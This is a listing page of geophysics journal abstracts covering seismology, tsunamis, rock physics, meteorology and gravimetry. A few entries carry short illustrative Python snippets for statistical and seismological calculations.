Abstract: We study damage induced by low-temperature variations in granite samples, given their role in shallow geological reservoirs. We consider two thermal treatments, slow cooling and thermal shock, and implement a multi-geophysical approach to characterize the induced micro-scale damage. The methodology consists in monitoring elastic wave velocity and thermal conductivity, as well as describing the damage by way of Hg-porosity measurements and microscopic observations. To assess the reproducibility of the induced damage, the same thermal protocol is performed on five samples. Our first results indicate that the thermal shock leads to more pronounced damage. This is interpreted to be due to a larger variety of nucleated intragranular and intergranular cracks, as observed by SEM and optical microscope. Yet this more significant damage does not appear reproducible from one sample to another, compared with the damage introduced by slow cooling. Accordingly, we propose a monitoring over time of elastic wave velocity, conductivity and Hg-porosity. It appears that the damage introduced by slow cooling, unlike that from thermal shock, does not persist for long: after 15 days, the different properties had returned to their initial state. A time-dependent mechanism is proposed to explain this observed process.

Updated: 2020-02-13

• Pure Appl. Geophys. (IF 1.466) Pub Date: 2020-02-10 Viacheslav K. Gusiakov

Abstract: The run-up catalogs of two global tsunami databases, maintained by NCEI/WDC NOAA and NTL/ICMMG SD RAS, are examined to compile the list of annual maximum runups observed or measured in oceanic, marine and inland basins during the last 120 years (from 1900 to 2019). All the retrieved annual maximum runups were divided into four groups according to the four main types of tsunami sources (seismogenic, landslide-generated, volcanic, and meteorological). Their distribution over source type shows that of the 120 maximum runups, only 78 (65%) resulted from seismogenic sources, while the remaining 42 were divided among landslide-generated (19%), volcanic (8%), and meteorological (7.5%) sources. The analysis of the geographical distribution of source locations demonstrates that tsunamis are not exclusively a marine hazard: over 15% of all maximum runups were observed in coastal and inland water basins (narrow bays, fjords, lakes, and rivers). The temporal distribution of the collected runups shows that the annual occurrence of large tsunamis was more or less stable throughout the twentieth century and only shows some increase during the last 27 years (since 1992), when the practice of post-event surveys of all damaging tsunamis was implemented. This paper also outlines the existing problems with data compilation, cataloguing, and distribution, and discusses the incompleteness of runup and waveform data for a considerable number of non-damaging tsunamis, even those resulting from strong (magnitude higher than 7.5) submarine earthquakes.

Updated: 2020-02-10

• Pure Appl. Geophys. (IF 1.466) Pub Date: 2020-02-06 Xiaofeng Chen, Brett M. Carpenter, Ze'ev Reches

Abstract: Stick–slips are spontaneous, unstable slip events during which a natural or man-made system transitions from a strong, sticking stage to a weaker, slipping stage. Stick–slips were proposed by Brace and Byerlee (Science 153:990–992, 1966) as the experimental analogue of natural earthquakes. We analyze here the mechanics of stick–slips along brittle faults by conducting laboratory experiments and by modeling the instability mechanics. We performed tens of shear tests along experimental faults made of granite and gabbro that were subjected to normal stresses up to 14.3 MPa and loading velocities of 0.26–617 µm/s. We observed hundreds of spontaneous stick–slips that displayed shear stress drops up to 0.66 MPa and slip velocities up to 14.1 mm/s. The pre-shear and post-shear fault surface topography was mapped with atomic force microscopy at pixel sizes as low as 0.003 µm². We attribute the sticking phase to the locking of touching asperities and the slipping phase to the brittle failure of these asperities, and found that the fault asperities are as strong as the inherent strength of the host rock. Based on the experimental observations and analysis, we derived a mechanical model that predicts the relationships between the measured stick–slip properties (stress drop, duration, and slip distance) and asperity strength.

Updated: 2020-02-07

• Pure Appl. Geophys. (IF 1.466) Pub Date: 2020-02-06 Mattia Aleardi, Alessandro Salusti

Abstract: We infer elastic and petrophysical properties from pre-stack seismic data through a transdimensional Bayesian inversion. In this approach the number of model parameters (i.e. the number of layers) is treated as an unknown, and a reversible jump Markov chain Monte Carlo (rjMCMC) algorithm is used to sample the variable-dimension model space. This inversion scheme provides a parsimonious solution and reliably quantifies the uncertainties affecting the estimated model parameters. Parallel tempering, which employs a sequence of interacting Markov chains in which the likelihood function is successively relaxed, is used to improve the efficiency of the probabilistic sampling. In addition, the delayed rejection updating scheme is employed to speed up the convergence of the rjMCMC algorithm to the stationary regime. Both the elastic and the petrophysical inversions invert the amplitude-versus-angle responses and employ a convolutional forward modelling based on the exact Zoeppritz equations. First, synthetic tests are used to assess the reliability of the implemented rjMCMC algorithms; then their applicability is demonstrated by inverting field seismic data acquired onshore. In this case the inversion was aimed at inferring the elastic and petrophysical properties around a gas-saturated reservoir hosted in a shale-sand sequence, and the final outcomes provided by the rjMCMC algorithms are also compared with the predictions of linear Bayesian elastic and petrophysical inversions. The synthetic and field data examples demonstrate that the implemented algorithms can successfully estimate model uncertainty, model dimensionality and subsurface parameters at an affordable computational cost.

Updated: 2020-02-07
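The parallel-tempering idea mentioned in the abstract above is easy to illustrate in isolation. Below is a minimal, self-contained sketch (not the authors' code; the bimodal Gaussian target and the temperature ladder are invented for the demo): several Metropolis chains sample tempered versions of a target, and neighbouring chains occasionally propose state swaps so the untempered chain can hop between modes.

```python
# Minimal parallel-tempering Metropolis sampler (illustrative only).
# Chains sample pi(x)^(1/T) for a ladder of temperatures T; neighbouring
# chains propose swaps, which helps the T = 1 chain escape local modes.
import numpy as np

rng = np.random.default_rng(0)

def log_post(x):
    # Toy bimodal target (an assumption for the demo, not a seismic posterior)
    return np.logaddexp(-0.5 * (x - 3.0) ** 2, -0.5 * (x + 3.0) ** 2)

temps = np.array([1.0, 2.0, 4.0, 8.0])     # temperature ladder
x = np.zeros(len(temps))                   # one state per chain
samples = []

for it in range(20000):
    # Within-chain Metropolis updates on the tempered targets
    for i, T in enumerate(temps):
        prop = x[i] + rng.normal(scale=1.0)
        if np.log(rng.random()) < (log_post(prop) - log_post(x[i])) / T:
            x[i] = prop
    # Propose swapping the states of a random neighbouring pair
    j = rng.integers(len(temps) - 1)
    dlog = (log_post(x[j + 1]) - log_post(x[j])) * (1 / temps[j] - 1 / temps[j + 1])
    if np.log(rng.random()) < dlog:
        x[j], x[j + 1] = x[j + 1], x[j]
    samples.append(x[0])                   # keep only the T = 1 chain

samples = np.array(samples[2000:])         # discard burn-in
print("fraction of samples near each mode:",
      np.mean(samples > 0), np.mean(samples < 0))  # roughly 0.5 / 0.5
```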
• Pure Appl. Geophys. (IF 1.466) Pub Date: 2020-02-06 Weiping Wang, Jiansi Yang, Yanbin Wang

Abstract: In the southeastern part of Tibet, an earthquake with a local magnitude of 6.9 occurred in the prefecture of Mainling on 18 November 2017. The mainshock and more than 900 aftershocks were recorded by a local seismic network comprising seven three-component seismic stations. In this study, both HypoDD relocation of aftershocks and focal mechanism inversion of moderate events were performed in order to accurately identify the pattern of active faults. The results reveal that the mainshock had a thrust source mechanism located at a depth of 14 km beneath the NE flank of the Namcha Barwa–Gyala Peri (NB-GP) massif. The aftershock sequences are caused mainly by two identified faults: one is the seismogenic fault, trending SE–NW parallel to the GP ridge with a steep NE-oriented dip; the other, activated by the mainshock, trends SSE–NNW and dips SW, indicating the adjustment of stress in the focal area. The source parameters of the mainshock and the selected aftershocks show the reverse character of the seismogenic fault and its adjacent fault, suggesting the backthrusting and uplift of the NB-GP massif, especially GP, in accommodating the uneven extrusion from the eastern Himalayan syntaxis towards the adjacent Lhasa block. Furthermore, it is deduced that the rupture energy of the mainshock and aftershocks was limited by the surrounding rigid rock mass with high seismic velocity, such as the Lhasa block in the north and east and the Namcha Barwa complex in the south; other aftershocks appearing at the NW top of GP and on the SE side of the Yarlung Tsangpo Big Bend reflect the strong squeezing effect of the NB-GP massif on its northeastern geological mass.

Updated: 2020-02-07

• Pure Appl. Geophys. (IF 1.466) Pub Date: 2019-11-06 Matheus Felipe Stanfoca Casagrande, César Augusto Moreira, Débora Andrade Targa

Abstract: Mineral exploration is often associated with the generation of environmental liabilities whose potential damage might imperil local water quality. An example of these environmental impacts is acid mine drainage (AMD), caused by sulfide oxidation and the production of acid and saline effluents. The analysis of critical areas with generation and spread of contamination plumes becomes more feasible thanks to the possibility of obtaining geophysical models of water systems, especially to identify regions with accumulations of reactive minerals and preferential water flows. The rock-waste pile named BF-04 fits this context of contamination, and it was studied with the electrical resistivity tomography technique, inversion models and isosurface models, providing the means to recognize sulfide zones (> 10.1 mV/V), whereas chaotic, high-salt-content underground flows at several depths were identified by low-resistivity zones (< 75.8 Ω m). The complex behavior of groundwater flow in this kind of artificial granular aquifer is caused by its granulometric and lithologic heterogeneities and compacted material. In addition, the results revealed substantial water infiltration from Consulta creek; however, the most critical zones for AMD generation are located at shallow levels, where the waste-rock material is more exposed to atmospheric O2 and meteoric water infiltration. The bedrock was not associated with significant low-resistivity anomalies, which means that its contribution to AMD generation was considered relatively less important. The results will contribute to environmental remediation management and also demonstrate the potential applicability of geophysical methods to mining wastes.

Updated: 2020-02-07

• Pure Appl. Geophys. (IF 1.466) Pub Date: 2019-08-22 Minyou Kim, Keunhee Lee, Yong Hee Lee

Abstract: There have been many studies aiming to improve visibility forecast skill using numerical models, but their performance still lags behind forecast skill for other meteorological phenomena. This study attempted to improve visibility forecasts using a newly established automatic visibility observation network composed of 291 forward-scattering sensors in South Korea. In the analysis of three recent years of visibility observations, clear days (visibility above 20 km) were reported on 46% of the days, and fog cases (visibility less than 1 km) accounted for 1.58% of the total observations. The Very short-range Data Assimilation and Prediction System (VDAPS) of the Korea Meteorological Administration (KMA) assimilated the visibility observations based on the Met Office Unified Model with the visibility data assimilation of Clark et al. (Q J R Meteorol Soc 134:1801–1816, 2008). Prior to the data assimilation, a precipitation check eliminated visibility data with precipitation (9.4% in total, 23% for visibility less than 1 km), and a consistency check removed visibility observations that were inconsistent with relative humidity, temperature, and pressure. In a case study of two consecutive fog days, visibility forecast skill was improved by applying visibility data assimilation, mostly through modifications of aerosol concentrations. A 3-month model run in the winter of 2016 showed a positive bias in visibility predictions, especially for the low-visibility cases. Visibility data assimilation improved the prediction skill, but the positive effects were limited to within 9 forecast hours and were smaller for extremely low-visibility events. Sensitivity experiments were performed using local aerosol observations with a larger number of smaller aerosol particles. Modifications in aerosol properties yielded better results in frequency bias for the whole forecast range and also improved the equitable threat score (ETS) for relatively longer forecast hours (more than 4 h).

Updated: 2020-02-07
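The frequency bias and equitable threat score (ETS) used for verification in the abstract above are standard contingency-table scores; a minimal sketch of their usual definitions (the counts below are made up for illustration):

```python
# Standard 2x2 contingency-table verification scores (illustrative counts).
# hits: event forecast and observed; false alarms: forecast but not observed;
# misses: observed but not forecast; total also includes correct negatives.
def frequency_bias(hits, false_alarms, misses):
    # Ratio of forecast to observed event frequency (1 = unbiased)
    return (hits + false_alarms) / (hits + misses)

def ets(hits, false_alarms, misses, total):
    # Equitable threat score: threat score corrected for random hits
    hits_random = (hits + misses) * (hits + false_alarms) / total
    return (hits - hits_random) / (hits + misses + false_alarms - hits_random)

print(frequency_bias(42, 18, 10))   # ~1.15 -> slight over-forecasting
print(ets(42, 18, 10, 500))         # ~0.56; 1 is perfect, 0 is no skill
```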
• Pure Appl. Geophys. (IF 1.466) Pub Date: 2019-10-17 Atsushi Sainoki, Chiaki Hirohama, Adam Karl Schwartzkopff

Abstract: In the numerical simulation of induced seismicity, much attention is generally paid to calibrating the frictional resistance of the causative fault so as to obtain a seismic moment consistent with that of the actual event, whereas the estimation of the slip-weakening distance Dc and the calibration of the seismically radiated energy are not investigated sufficiently. The present study addresses this problem by numerically and analytically investigating the relation between Dc and seismic source parameters. First, this study performs a dynamic simulation of an induced seismic event caused by a decrease in the effective normal stress. The analysis demonstrated that the seismic efficiency η can be used to improve the accuracy of estimating the critical slip-weakening distance and the coefficient of kinetic friction µd while considering not only seismic moment but also radiated energy in the calibration. This gave insight into the development of a new calibration method for induced seismicity that considers energy-related seismic source parameters. Furthermore, a new scaling law for the slip-weakening distance was derived from the theoretical expression for the seismic efficiency η, considering the seismic moment Mo and the scaled energy $\hat{e}$. The proposed scaling law can yield the relation between Dc and Mo, which is shown to be similar to that obtained in a previous study, but additionally accounts for the relation between seismically radiated energy and Dc. The dependency of Dc on seismically radiated energy implied by the proposed scaling law has been verified through dynamic analyses in which η = 0.06 was used to place a constraint on Dc for seismic events with different magnitudes. The developed numerical simulation methodology for induced seismicity, together with the scaling law considering the energy indices, significantly contributes to improving the accuracy of back-analysis, thus leading to a more accurate estimation of the mechanical properties of faults and/or shear zones in seismically active regions of deep underground mines or reservoirs composed of discontinuous hard rock masses.

Updated: 2020-02-07

• Pure Appl. Geophys. (IF 1.466) Pub Date: 2019-10-09 Carles Mulet-Forteza, Antonio Socias Salvá, Sebastian Monserrat, Angel Amores

Abstract: Pure and Applied Geophysics (PAGEOPH) is one of the leading journals in the field of geophysics. The first issue was published in 1939; thus, the journal is celebrating its 80th anniversary in 2018. The aim of this paper is to provide a complete lifetime overview of the academic structure of the journal using bibliometric indicators. This analysis includes key factors such as the most cited articles, leading authors, originating institutions and countries, publication and citation structures, and the most commonly used keywords. The bibliometric data used to conduct this analysis come from the Scopus database. Additionally, the visualization of similarities (VOSviewer) software is used to create a graphic map of some of the bibliometric results. The graphical analysis uses co-citation, bibliographic coupling and co-occurrence of keywords. The results indicate that PAGEOPH is a leading journal in the areas in which it is indexed, with publications from a wide range of authors, institutions, and countries around the world.

Updated: 2020-02-07

• Pure Appl. Geophys. (IF 1.466) Pub Date: 2019-10-29 Zhen Fu, Lisheng Xu, Yongzhe Wang

Abstract: On the basis of the continuous and dense GPS observations covering the northern segment of the Xiaojiang fault zone (n-XJFZ) from March 2012 to March 2016, we present the velocity field, spatiotemporal deformation, slip rate and locking depth of the n-XJFZ. The results provide strong support for a better understanding of the deformation behavior of this fault. The heterogeneity of the GPS velocity field and the relatively nonuniform distribution of seismicity suggest that the observational area is fragmented. Shear strain has been accumulating with an almost constant azimuth, consistent with the trends of the mapped major faults. The 2014 Ms 6.5 Ludian earthquake produced a sudden change in the dilatational strain, which was almost constant prior to the event, and an increase in the shear strain rate. The near-field deformation of the n-XJFZ estimated with the near-field data was larger than expected, revealing that the n-XJFZ is becoming more locked. These results imply that the seismic risk in the study area is currently rising and that, similar to the 2014 Ms 6.5 Ludian earthquake, future earthquakes will possibly occur away from mapped faults.

Updated: 2020-02-07

• Pure Appl. Geophys. (IF 1.466) Pub Date: 2019-08-22 Rubeni T. Ranganai, Oswald Gwavava, Cynthia J. Ebinger, Kathryn A. Whaler

Abstract: The subsurface geometry of five representative late Archaean 'Chilimanzi and Razi' suite plutons in the Zimbabwe craton (ZC) has been investigated by gravity modelling, constrained in part by surface geology, density measurements and seismic information, to determine their 3D configuration and infer the tectonic context of emplacement. The generally K-rich, massive, homogeneous monzogranites are characterised by large Bouguer gravity lows (up to −30 mGal amplitude) whose gradients outline their spatial extent well. The southernmost plutons and their anomalies have general trends paralleling the North Marginal Zone (NMZ) of the Limpopo orogenic belt (LB). Predictive gravity models indicate that the density contrast of the Chivi batholith (CB), adjacent to the 'volcanic arc-like' Belingwe greenstone belt, extends to a depth of about 13 km. The nearby Razi pluton (RP), which intrudes the ZC-LB boundary, appears to have been emplaced at shallower levels. The gravity model suggests a thickness of about 5–6 km and a moderate to shallow dip to the southeast under the NMZ, compatible with syn-kinematic intrusion during overthrusting of the LB over the ZC. The smallest, the Nalatale granite (Ng), is on average 2.5 km thick under the Fort Rixon greenstone belt but includes a root up to 4.5 km thick under the anomaly peak, and a steep contact with the tonalite/gneiss to the east. These granites follow the general power law for pluton dimensions and are similar in this respect to the classical wedge-shaped plutons, extending largely in one direction, with large aspect ratios (Length (L)/Thickness (T) > 7). However, the overall shape of the RP is typical of a diapir (Width (W) < T), although it may have been affected by the LB deformation. Gravity modelling along a NS traverse crossing the Chilimanzi batholith (ChB), the Masvingo greenstone belt (MGB) and the Zimbabwe granite (ZG) indicates a thickness of around 6 km for the dense greenstone belt and a thickness of about 8.5 km for the adjacent ZG. The 'complex'-shaped ChB shows a 2 km thick tabular body with a root zone extending to ~4.5 km depth at the south end, adjacent to the greenstone belt, typical of the so-called flat-floored plutons with a floor dipping gently towards the root zone. These two plutons roughly follow the power law for laccolith/batholith dimensions (W/T > 5; L/T > 15). Overall, the CB and the ZG are interpreted as massive, deep-rooted batholithic intrusions (L/T ≅ 10), contrary to some geological interpretations of these late, post-kinematic intrusions as sheet-like bodies emplaced at relatively shallow levels in the crust. On the other hand, the ChB appears to be a tabular intrusion, probably fed by dykes; it exhibits a lateral extent much greater than its vertical one, outlining a sheeted geometry (W/T > 7; L/T > 18). The geophysical evidence, together with geological and fabric data, supports and/or confirms the two main granite configurations, sheets and batholiths, and thus also confirms the two main modes of emplacement: dykes and diapirism or ballooning plutonism. This is consistent with other known batholiths on the ZC but is considered unusual for plutons of the same age and spatially close to each other when compared with other Archaean cratons.

Updated: 2020-02-07
• Pure Appl. Geophys. (IF 1.466) Pub Date: 2019-09-09 Łukasz Wojtecki, Petr Konicek, Maciej J. Mendecki, Iwona Gołda, Wacław M. Zuberek

Abstract: Deep longwall mining of coal seams in the Upper Silesian Coal Basin (USCB) takes place under complicated and mostly unfavourable geological and mining conditions, and is usually associated with a high level of rockburst hazard. One of the geological factors affecting the state of rockburst hazard is the presence of competent rocks in the roof of the extracted coal seams, so that rock falls behind the longwall face do not occur and the roof rocks remain hung up. The long-lasting absence of caving may lead to the occurrence of a high-energy tremor in the vicinity of the longwall face. Roof caving behind the longwall face may be forced by blasting, with the column of explosives located in blastholes drilled into layers of roof rocks, e.g. sandstones, behind the longwall face. In this article, tremors initiated by blasts for roof caving during the underground extraction of coal seam no. 507 in one of the collieries in the USCB are characterized using three independent methods. In the basic seismic effect method, the effectiveness of blasting is evaluated from the seismic energy of the incited tremors and the mass of explosives used; according to this method, the selected blasts gave extremely good or excellent effects. Inversion of the seismic moment tensor makes it possible to determine the processes occurring in the tremor sources: in the foci of the provoked tremors a slip mechanism dominated or was clearly distinguished, while the expected explosive component had lesser significance or was absent. Analysis of the seismic source parameters allows, among other things, the stress drop in the focus and the source size to be estimated: the stress drop in the foci of the provoked tremors was of the order of 10^5 Pa, and the source radius, according to Brune's model, varied from 44.3 to 64.5 m. The results of the three methods were compared with each other and with in situ observations. In all cases the roof fall was successfully forced.

Updated: 2020-02-07
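For context on the Brune-model source parameters quoted above, here is a minimal sketch of the standard relations between corner frequency, source radius and stress drop; the input values are invented for illustration, not taken from the paper:

```python
# Standard Brune-model relations: source radius r = 2.34*beta/(2*pi*fc)
# and stress drop = 7*M0/(16*r^3). Inputs below are assumed values.
import math

beta = 3000.0          # shear-wave velocity near the source, m/s (assumed)
fc   = 25.0            # corner frequency of the event, Hz (assumed)
M0   = 1.0e11          # seismic moment, N*m (assumed)

r = 2.34 * beta / (2.0 * math.pi * fc)        # Brune source radius, m
stress_drop = 7.0 * M0 / (16.0 * r ** 3)      # stress drop, Pa

print(f"source radius: {r:.1f} m")            # ~44.7 m for these inputs
print(f"stress drop:   {stress_drop:.2e} Pa") # order 1e5 Pa
```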
• Pure Appl. Geophys. (IF 1.466) Pub Date: 2019-10-09

Abstract: A retrospective analysis of 17 years of NCMRWF Global Forecast System (NGFS) data was conducted to understand the state and variability of cold wave episodes over northwest India. During the 2000–2016 period, a total of 21 cold wave episodes (202 cold nights) were detected, of which 5 were severe cold episodes (63 cold nights). Ten (six) episodes occurred during La Niña (El Niño) years, suggesting that both phases of the El Niño–Southern Oscillation provide a favourable background for the occurrence of cold waves. The average duration of a cold wave episode was ~9.6 days, with the longest (shortest) episode, seen in the year 2008 (2006), lasting for 26 (6) consecutive days. The average duration of a severe cold wave episode is ≈4 days longer than that of a normal cold wave. In the year 2005, both the earliest (11 December) and the latest (16 February) onsets of cold waves were seen. The omnipresence of an intense Siberian anticyclone and the presence of western disturbances brought cold winds to the study region. Temperature advection and geopotential height anomalies also play vital roles in the maintenance of cold waves. The cold waves exhibit significant intra-annual variability over northwest India. The intensity of cold waves has shown an increase of 0.11 °C per cold episode.

Updated: 2020-02-07

• Pure Appl. Geophys. (IF 1.466) Pub Date: 2019-11-11 Samiran Das, Dehua Zhu, Chi-Han Cheng

Abstract: Changes in overall observed precipitation have been recognized in many parts of the world in recent decades, fuelling the debate on climate change and its impact on extreme precipitation. However, natural variability and the complex physical mechanisms hidden in the observed data sets must also be taken into consideration. This study aims to examine the matter further with reference to inter-decadal variability in extreme precipitation quantiles appropriate for risk analysis. Temporal changes in extreme precipitation are assessed using a parametric approach incorporating a regional method in region-of-influence form. The index-flood method with the generalized extreme value distribution is used to estimate the decadal extreme precipitation. The study also performs a significance test to determine whether the decadal extremes are significant. A case study is performed on the Yangtze River Basin, where annual maximum 1-day precipitation data for 180 stations were analyzed over a 50-year period from 1961 to 2010. Extreme quantiles estimated from the 1990s data emerged as significant on several occasions. The immediate drop in the quantile values in the following decade, however, suggests that it is not practical to assign more weight to recent data in the quantile estimation process. The temporal patterns identified are in line with previous studies conducted in the region, which makes this an alternative way to perform decadal analysis, with the advantage that the scheme can be transferred to ungauged conditions.

Updated: 2020-02-07
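As a minimal illustration of the GEV-based quantile estimation used in studies like the one above (the annual-maximum series below is synthetic, not the Yangtze data; scipy's genextreme is one common implementation):

```python
# Fit a generalized extreme value (GEV) distribution to annual maximum
# 1-day precipitation and read off return-level quantiles.
import numpy as np
from scipy.stats import genextreme

rng = np.random.default_rng(42)
annual_max = genextreme.rvs(c=-0.1, loc=60.0, scale=15.0,
                            size=50, random_state=rng)  # mm/day, synthetic

c, loc, scale = genextreme.fit(annual_max)   # maximum-likelihood fit
for T in (10, 50, 100):                      # return periods in years
    q = genextreme.ppf(1.0 - 1.0 / T, c, loc=loc, scale=scale)
    print(f"{T:>3}-year return level: {q:.1f} mm/day")
```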
• Pure Appl. Geophys. (IF 1.466) Pub Date: 2019-08-29 Blas F. de Haro Barbás, Ana G. Elias

Abstract: One of the main ionization sources of the F2 region of the Earth's ionosphere is the solar EUV irradiance, which accounts for ~90% of its variability during quiet times. Consequently, prior to long-term trend estimation, solar activity must be filtered out. The last two solar activity cycles present low activity levels; in particular, solar cycle 24 is the lowest of the last ten solar cycles. The effect of the inclusion of this last solar cycle on foF2 trend estimation is analyzed for two mid-latitude ionospheric stations: Kokubunji (35.7°N, 139.5°E) and Wakkanai (45.4°N, 141.7°E). Filtering is done by considering the residuals of different regressions between foF2 and Rz, and also between foF2 and F10.7. In both cases, foF2 trends become less negative when solar cycle 24 is included in the trend estimation, since the foF2 residuals systematically exceed the values predicted by a linear, quadratic or cubic fit between foF2 and F10.7 or Rz from 2008 onwards. In addition, the Earth's magnetic field secular variation at both stations would induce a positive foF2 trend during daytime that could counteract the decreasing trend due to greenhouse gases. It is interesting to note that including the latest solar cycles does not necessarily imply incorrect results in the statistical analysis of the data, but simply that solar activity is decreasing on average, and with it the trend.

Updated: 2020-02-07

• Pure Appl. Geophys. (IF 1.466) Pub Date: 2020-02-05 Sergii Kivva, Mark Zheleznyak, Oleksandr Pylypenko, Vasyl Yoschenko

Abstract: Our goal was to develop a robust algorithm for the numerical simulation of one-dimensional shallow water flow in a complex multiply-connected channel network with arbitrary geometry and variable topography. We apply a central-upwind scheme with a novel reconstruction of the open water surface in partially flooded cells that does not require additional correction. The proposed reconstruction and an exact integration of the source terms of the momentum conservation equation provide the positivity-preserving and well-balanced features of the scheme for various wet/dry states. To treat channel junctions, we use two models based on the continuity equation and on the mass and momentum conservation equations integrated over a control volume around the junction. These junction models permit the simulation of subcritical and supercritical flows in a channel network. Numerous numerical experiments demonstrate the robustness of the proposed numerical algorithm and the good agreement of the numerical results with exact solutions, experimental data, and the results of previous numerical studies. A proposed new specialized test on the inundation and drying of an initially dry channel network shows the merits of the new numerical algorithm for simulating subcritical/supercritical open water flows in networks.

Updated: 2020-02-06

• Pure Appl. Geophys. (IF 1.466) Pub Date: 2020-02-05 Peter Vajda, Pavol Zahorec, Juraj Papčo, Daniele Carbone, Filippo Greco, Massimo Cantarero

Abstract: Some geophysical or geodynamic applications require the use of the true vertical gradient of gravity (VGG). This demand may be associated with reductions of, or corrections to, observed gravity or its spatiotemporal changes. In the absence of in situ measured VGG values, the constant value of the theoretical (normal) free-air gradient (FAG) is commonly used. We propose an alternative to this practice which may significantly reduce the systematic errors associated with the use of a constant FAG. In areas with prominent and rugged topography, such as alpine or some volcanic regions, the true VGG appears to be better approximated by a value based on the modelled contribution of the topographic masses to the gradient. Such a prediction can be carried out with a digital elevation model (DEM) of sufficient resolution and accuracy. Here we present the VGG field computed for Mt. Etna (Italy), one of the most active and best-monitored volcanoes worldwide, to illustrate how strongly the VGG deviates spatially from the constant FAG. The predicted (modelled) VGG field is verified by in situ observations. We also examine the sensitivity of the VGG prediction to the resolution and quality of the DEMs used. We conclude by discussing the applicability of the topography-predicted VGG field in near-surface structural and volcanological micro-gravimetric studies.

Updated: 2020-02-06
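For orientation, the constant normal free-air gradient that the paper above proposes to replace is, to first order, the standard geodesy value

$$\frac{\partial g}{\partial h} \approx -0.3086\ \text{mGal/m},$$

so a gravity observation made at a height difference $\Delta h$ from a reference is conventionally reduced by $0.3086\,\Delta h$ mGal; the paper's topography-based VGG replaces this constant with a spatially varying, DEM-derived value.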
Updated: 2020-02-06

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-02-05
Giancarlo Dal Moro

Abstract: In seismic hazard studies, the Horizontal-to-Vertical Spectral Ratio (HVSR) is nowadays routinely considered as a quick way to assess possible amplification effects. However, because of several issues that can affect the data, the HVSR cannot be considered valid per se, and a careful data evaluation is necessary. In this study, a series of HVSR curves are evaluated in order to highlight industrial components that can significantly alter the natural HVSR. First, a controlled-source experiment is carried out in order to define the characteristics of spurious industrial signals. Data analysis shows that the coherence functions and the mildly smoothed amplitude spectra plotted with linear scales can help significantly in identifying industrial components that can otherwise be difficult to highlight. Coherence functions appear particularly interesting because of their ability to reveal the presence of industrial components independently of their amplitude. Field data from three sites are then analyzed on the basis of the evidence obtained through the controlled-source experiment. For the third site, data recorded on two different days are considered. While in the first data set no significant industrial component is present, in the second and third data sets a series of remarkable industrial signals that severely alter the natural HVSR are identified. The assessment of the coherence functions and mildly smoothed amplitude spectra is therefore suggested as a valuable support to avoid pitfalls in the interpretation of the experimental HVSR. Finally, two quick-and-dirty procedures aimed at reducing the effect of industrial components are also presented.

Updated: 2020-02-06

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-02-03
Kejia Wang, Richard E. Thomson, Alexander B. Rabinovich, Isaac V. Fine, Tania L. Insua

Abstract: The major (Mw 7.9) earthquake that struck the Gulf of Alaska near Kodiak Island on 23 January 2018 was a rare, mid-plate strike-slip event that triggered a minor trans-Pacific tsunami. An analysis of the simultaneous measurements of tsunami waveforms at 21 open-ocean sites (including three independent arrays of stations) and 27 coastal tide gauges in the Gulf of Alaska and along the coast of North America has enabled us to examine properties of the 2018 tsunami, its transformation over the continental slope and shelf, and its amplification as the waves approached the coast. Results show that the tsunami wave variance decreased monotonically along the west coast from northern British Columbia to southern Oregon. Based on the variance structure, the mean amplification factor for Tofino on the west coast of Vancouver Island (a "beacon" site with a long time series) was A_RMS^Tof = 5.3, in good agreement with corresponding estimates for four major past events: 4.5 (2009 Samoa), 4.3 (2010 Chile), 6.3 (2011 Tohoku) and 5.2 (2012 Haida Gwaii). This variance-derived amplification for Tofino was greater than the amplification factor based on the amplitude ratio (A^Tof = 3.2). Spectral analysis of the records showed that the tsunami had a relatively large high-frequency content (i.e., was "blueish"), with nearly 90% of the total energy in the open ocean at frequencies > 1.7 cph (periods < 35 min) and with an "integral frequency scale" of 4 cph (period 15 min).
Wavelet analysis revealed strong dispersion of the propagating tsunami waves, in agreement with theoretical estimates. The abrupt jump in water depth of about 4 cm detected at DART 46409, located mid-plate about 85 km from the epicenter of the 2018 Kodiak earthquake, appears to have been due to earthquake-induced seafloor subsidence.

Updated: 2020-02-03

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-02-03
V. F. Pisarenko, M. V. Rodkin

Abstract: The possibilities of statistical estimation of quantiles of predicted maximum peak ground acceleration are discussed. The estimation is based on the theory of extreme values. The quantiles of maximum peak ground acceleration are calculated for a spatial grid covering the territory of the high-seismicity regions of Japan, the Kuril Islands, and Kamchatka. A new phenomenon is observed: spatial spots of increased ground acceleration showing essential inhomogeneity not only across the deep ocean trench but also along its extension. Some spots exist during the whole observation time (130 years), whereas others can disappear or appear during this time interval. The position of the majority of spots correlates with the concentration of underwater seamounts at the adjacent part of the oceanic plate. The subduction of these seamounts could induce increased seismicity. A correlation of spots with sites of increased (Mb − Mw) values is also observed, which can be caused by increased friction between the plates. Stable spots of higher acceleration are observed for different earthquake catalogs and various time periods. Our results support the use of extreme value theory for the statistical estimation of seismic hazard, in particular for the characterization of seismic activity spots.

Updated: 2020-02-03

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-31
Alessandro Longo, Stefano Bianchi, Wolfango Plastino, Irene Fiori, Donatella Fiorucci, Jan Harms, Federico Paoletti, Matteo Barsuglia, Mikel Falxa

Abstract: A methodology using adaptive time series analysis is tested on data from a seismometer monitoring the north end building (NEB) of the Virgo interferometer during four acoustic noise injections. Empirical mode decomposition (EMD) is used for adaptive detrending, while the recently developed time-varying filter EMD algorithm is used for narrowband mode extraction. Mode persistency is evaluated with detrended fluctuation analysis, and denoising is achieved by setting a threshold H_thr on the Hurst exponent of the obtained modes. The adopted methodology proves useful in adaptively separating the seismic noise induced by the acoustic noise injections from the underlying nonlinear, non-stationary recordings of the seismometer monitoring the NEB. The Hilbert–Huang transform provides a high-resolution time–frequency representation of the data. Furthermore, the local Hurst exponent exhibits a drop due to the injections that is of the same order as H_thr. This suggests that the local Hurst exponent could be calculated as an initial step in order to select the threshold H_thr. The algorithms could be used for detector characterisation purposes such as the investigation of non-Gaussian noise.

Updated: 2020-01-31

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-31
C. Nunziata, M. R. Costanzo

Abstract: Ground motion is computed at the historical center of Napoli for the 5 December 1456 and 5 June 1688 earthquakes responsible for VIII maximum felt intensity (MCS scale).
